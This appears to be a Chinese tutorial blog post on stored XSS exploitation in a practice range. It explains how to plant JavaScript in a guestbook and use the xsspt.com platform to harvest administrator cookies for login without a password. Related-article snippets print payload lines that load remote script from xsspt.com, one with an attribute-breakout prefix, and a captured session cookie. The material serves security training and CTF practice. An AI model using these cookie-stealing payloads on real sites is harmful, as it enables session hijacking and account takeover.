掌控安全第四课xss利用

最新推荐文章于 2025-05-05 06:00:00 发布
原创 最新推荐文章于 2025-05-05 06:00:00 发布 · 1.3k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss

xss漏洞利用原理

存在xss漏洞的留言板,提交留言的内容为js代码,xss漏洞会直接执行,可以利用这个漏洞还将登录到留言页面的所有的主机的信息打到一个指定的位置,可以自己架设一个平台或者,打到xss平台,然后利用打到的cookie信息登录到管理页面不用输入管理员账号密码

Xss平台可以接受打到的cookie等信息

http://xsspt.com/index.php?do=project&act=view&id=42583

靶场网址

http://117.41.229.122:8004/Feedback.asp
在这里插入图片描述
提交留言的内容为js代码,xss漏洞会直接执行

xss平台搭建

利用上面的xss网址注册一个账号并配置如下
因为XSS Payload的强大,也是为了使用的方便,有安全研究者将许多功能封装了起来做成了XSS平台。也是因为插入点一般都有长度限制,所以说xss一般攻击都需要外链。我在这里演示用的是网上的xss平台:http://xsspt.com,需要自己去注册和登录,反正账号密码知道就行了,邮箱反正不验证不建议写真实的。
我们先建立项目,名称什么乱选都行,就是选择模块的时候记得选取这两个
在这里插入图片描述然后你可以看到一叠代码,这个就是两个模块中的XSS Payload,现在你们能够理解为什么要XSS平台了吧,我们用滚轮拖到最下面
在这里插入图片描述随便选择其中的一个js代码,填写到留言板提交,只要等管理员登录就行了。
在这里插入图片描述

掌控安全学院SQL注入靶场
qaq517384的博客
11-18 4024
总体没啥难度,也没有啥过滤,拿来复健感觉还不错,最后一个宽字节注入又花了点时间研究了一下
前端安全-XSS、CRSF、SSRF总结
风物长宜放眼量
04-03 822
前端安全-XSS、CRSF、SSRF总结 引用 作者:美团技术团队 前端安全系列之一:如何防止XSS攻击? 链接:https://juejin.im/post/5bad9140e51d450e935c6d64 前端安全系列之二:如何防止CSRF攻击? 链接:https://juejin.im/post/5bc009996fb9a05d0a055192 作者:BerL1n 链接:https://w...
xsspt网址
stc的博客
02-13 3557
https://xsspt.com https://xss.pt/xss.php http://xssye.com
05. XSS漏洞利用
weixin_43909650的博客
12-17 1018
2022网安冬令营(web安全/渗透测试/实战训练)——蚁景网安 https://ke.qq.com/course/5874132#term_id=106089914
web安全XSS测试平台使用教程
平平无奇
08-12 2万+
我接触使用过三个XSS平台 1.脚本非常丰富:http://www.1oad.com 2.简约:https://xsspt.com 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明; 一、注册用户并登录 二、创建项目 1.创建项目,创建完后会生成一个xss可用脚本地址 项目名...
Xss测试平台.zip
03-06
XSSer——用于检测和利用XSS漏洞的自动Web测试框架工具 XSS是一种非常常见的漏洞类型,它分布非常广泛,且比较容易被检测到。 攻击者可以在无需验证的情况下将不受信任的JavaScript片段插入到应用程序中。然后,该JavaScript片段将会被访问目标站点的受害者执行。https://gbhackers.com/a3-cross-site-scripting-xss/ 跨站点“Scripter”(又名Xsser)是一个自动框架,用于检测、利用和报告基于Web的应用程序中的XSS漏洞。 它包含几个可以绕过某些过滤器的选项,以及各种特殊的代码注入技术。
【重磅案例】JSXZ集团网络信息安全规划方案(3/4)
最新发布
领信卓越的博客
05-05 1301
步入2024年,JSXZ集团正处于其数字化战略转型的关键节点,这一时期,数字经济的深化发展将成为主旋律。为了积极响应《网络安全法》中提出的“同步规划、同步建设、同步运行”的网络安全与信息化建设三同步原则,本次安全规划致力于开创一种全新的网络安全模式,该模式涵盖从顶层策略设计、具体部署实施到日常安全运维的全过程。此举旨在推动企业的网络安全体系向实战化、对抗性的高级阶段迈进,以更好地应对日益复杂的网络威胁。
网络安全简介(入门篇)
不甘于平凡的溃败的博客
08-18 3956
博主现从事网络安全行业,在工作之余自己从网上、书籍以及自己总结出一些关于网络安全的知识,本文采用理论和实践相结合方式进行讲解,首先对网络安全进行理论介绍,最后再结合一个安全渗透小案例实践讲解;特分享给大家,供从事计算机软件、网络信息安全领域以及网络安全爱好者学习、交流。
网络安全防御体系构建思路
hackzkaq的博客
11-06 749
在某一天的深夜,作为安全从业人员,穿着大裤衩子,坐在门前,点燃一根烟(画面自己想象)开始思考企业如何打造自己的安全体系,虽然这不是作为月薪3k该考虑的问题,但是毕竟当初笔者的从业理想是想成为道哥一样的人,为安全行业贡献自己的一份力。于是写下自己的想法,对于中小企业我希望能够完善自己的安全体系,花最少的钱做好安全这件事;对于安全人员我希望大家多考虑企业面临的危险点,而不只是会开一个扫描器做一个定时任务、开一个dirsearch就睡觉的那种!
【随时随地校园安全掌控】:iSecure Center-Education移动应用接入指南(移动管理无缝体验)
![iSecure Center-Education]... ...# 1. 移动应用安全接入概览 ## 1.1 移动应用安全接入的重要性 在数字时代,移动应用已成为企业服务和内部管理的重要组成部分。随着移动设备的普及和应用数量的增加,移动应用的安
XSS漏洞利用方式汇总
Kevin's Blog
05-04 1万+
文章目录一、窃取Cookie1.1 解释1.2 操作搭建xss平台二、 以下所有的针对XSS利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!! 一、窃取Cookie 1.1 解释   恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。 1.2 操作 搭建xss平台 这里我直接百度使用一个xss平台来接Cookie Tips:为了安全...
网络安全学习:渗透测试钓鱼案例,夯实基础
kali_Ma的博客
09-02 2856
简介 请注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。 名言: 你对这行的兴趣,决定你在这行的成就! 2021最新整理网络安全\渗透测试/安全学习(全套视频、大厂面经、精品手册、必备工具包)一>戳我拿<一 一、前言 网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、
掌控安全第二关记录
haodawei123的博客
01-04 3337
掌控安全第二关记录网址寻找注入点亮点1、使用cookie传参进行注入测试这里的“+”很关键 网址 第二关网址:http://117.41.229.122:8004/ 寻找注入点 点击其中的一个新闻得到网址http://117.41.229.122:8004/shownews.asp?id=171 http://117.41.229.122:8004/shownews.asp?id=171 ord...
ctf实战 掌控安全的靶场 第四关通关记录
wh1te 小白的博客
09-20 1833
掌控安全封神台第四关 根据提示为存储型xss flag在cookie中 xss平台其实网上就有 可以直接用 xsspt.com  xss平台大致如下 点击创建项目输入项目名字 选择模块是要注意选择 默认模块和xss.js 生成代码  将xss语句插入到留言板中 即可在xss平台中接收到平台模拟的管理员访问记录  得到flag 通关...
【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
【封神台 - 掌控安全靶场】尤里的复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
xss防御方法base64_绕过某通用信息管理系统实现XSS
weixin_39644614的博客
12-08 309
作者:青空酱 合天智汇原创投稿活动:重金悬赏 | 合天原创投稿等你来 序言实战渗透某站点时遇到的,经过几天研究最终成功绕过限制并打到管理员cookie,特此记录下备忘。将一些琐碎的tr...
测试xss <script src=https://xsspt.com/zuR9HU?1600508448></script>
weixin_34341749的博客
09-20 456
<script src=https://xsspt.com/zuR9HU?1600508448></script>
XSS平台-学习
weixin_30273501的博客
05-11 961
单点登录 - Telnet 404https://sso.telnet404.com/cas/login?service=https%3A%2F%2Fwww.seebug.org%2Faccounts%2Flogin%2F%3Fnext%3D%252Fcontribute%252Fvul XSS平台-友情https://xsspt.com/index.php?do=flink XSS平台-学习...
"/><script src=http://xsspt.com/FuyOUa?1475054160></script><!-
xsstestaccount的博客
09-28 625
xsstest
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值